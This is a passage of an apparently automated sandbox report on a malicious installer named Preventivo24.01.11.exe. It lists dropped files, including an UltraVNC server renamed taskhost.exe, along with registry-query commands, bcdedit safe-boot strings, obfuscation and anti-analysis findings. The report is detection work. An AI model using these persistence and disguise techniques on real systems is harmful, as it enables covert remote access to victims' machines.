Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini Jump to behavior
Source: C:\Games\taskhost.exe File opened: C:\Windows\SysWOW64\RICHED32.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Preventivo24.01.11.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Preventivo24.01.11.exe Static file information: File size 5955744 > 1048576
Source: Preventivo24.01.11.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains a suspicious time stamp
Source: shi6E82.tmp.0.dr Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00FC0CA0
PE file contains sections with non-standard names
Source: Preventivo24.01.11.exe Static PE information: section name: .didat
Source: ddengine.dll.0.dr Static PE information: section name: .SharedD
Source: shi6E82.tmp.0.dr Static PE information: section name: .wpp_sf
Source: shi6E82.tmp.0.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009F6820 pushfd ; iretd 0_3_009F6825
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009F6064 push esp; retf 0_3_009F6069
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A8900 push ebp; ret 0_3_009A8901
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009AA5B8 push eax; ret 0_3_009AA5BA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009A8DA4 push ecx; ret 0_3_009A8DB1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_00968443 push ds; retf 0_3_00968444
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_00963A48 push ecx; ret 0_3_00963A49
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009683CF push ds; retf 0_3_009683D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_009705F3 push 00000078h; retf 0_3_009705F5
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F9A4B0 push ecx; mov dword ptr [esp], 3F800000h 0_2_00F9A60F
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108B2DE push ecx; ret 0_2_0108B2F1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9D5CA push esi; ret 0_2_00E9D5CC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9FB10 push ecx; mov dword ptr [esp], ecx 0_2_00E9FB11
Source: C:\Games\viewer.exe Code function: 6_2_006350CC push ecx; ret 6_2_006350DF
Source: C:\Games\viewer.exe Code function: 6_2_00635676 push ecx; ret 6_2_00635689
Source: C:\Games\taskhost.exe Code function: 41_2_001E6143 push ecx; ret 41_2_001E6156
Source: C:\Games\taskhost.exe Code function: 41_2_000A51FF pushad ; iretd 41_2_000A5218
Source: C:\Games\taskhost.exe Code function: 41_2_000AE25B pushad ; iretd 41_2_000AE25C
Source: C:\Games\taskhost.exe Code function: 41_2_000AE263 pushad ; iretd 41_2_000AE264
Source: C:\Games\taskhost.exe Code function: 41_2_000A5265 push 60F5C5F1h; iretd 41_2_000A5278
Source: C:\Games\taskhost.exe Code function: 41_2_000AE27D pushad ; iretd 41_2_000AE27E
Source: C:\Games\taskhost.exe Code function: 41_2_000AE275 pushad ; iretd 41_2_000AE276
Source: C:\Games\taskhost.exe Code function: 41_2_000AC5A6 pushad ; iretd 41_2_000AC5A9
Source: C:\Games\taskhost.exe Code function: 41_2_000AE5FB pushad ; iretd 41_2_000AE5FC
Source: C:\Games\taskhost.exe Code function: 41_2_000AE603 pushad ; iretd 41_2_000AE604
Source: C:\Games\taskhost.exe Code function: 41_2_000AE61D pushad ; iretd 41_2_000AE61E
Source: C:\Games\taskhost.exe Code function: 41_2_000AE615 pushad ; iretd 41_2_000AE616
Source: C:\Games\taskhost.exe Code function: 41_2_000ADEBB pushad ; iretd 41_2_000ADEBC
Source: C:\Games\taskhost.exe Code function: 41_2_000ADEC3 pushad ; iretd 41_2_000ADEC4
Source: C:\Games\taskhost.exe Code function: 41_2_000ADEDD pushad ; iretd 41_2_000ADEDE
Source: C:\Games\taskhost.exe Code function: 41_2_000ADED5 pushad ; iretd 41_2_000ADED6

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Drops PE files
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\shi6E82.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI6F00.tmp Jump to dropped file
May use bcdedit to modify the Windows boot settings
Source: taskhost.exe.0.dr Binary or memory string: bcdedit.exe
Source: taskhost.exe.0.dr Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: C:\Games\taskhost.exe Code function: 41_2_000CAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 41_2_000CAEE0
Source: C:\Games\taskhost.exe Code function: 41_2_000C7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 41_2_000C7AE0
Source: C:\Games\taskhost.exe Code function: 41_2_000D37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC, 41_2_000D37A0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Games\viewer.exe Code function: 6_2_00633D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00633D28
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Games\viewer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Games\taskhost.exe Code function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 41_2_000C57B0
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 402
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6E82.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll Jump to dropped file
Found evasive API chain (date check)
Source: C:\Games\taskhost.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Games\viewer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Games\viewer.exe API coverage: 5.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 8544 Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8964 Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9112 Thread sleep count: 171 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8212 Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8260 Thread sleep count: 166 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
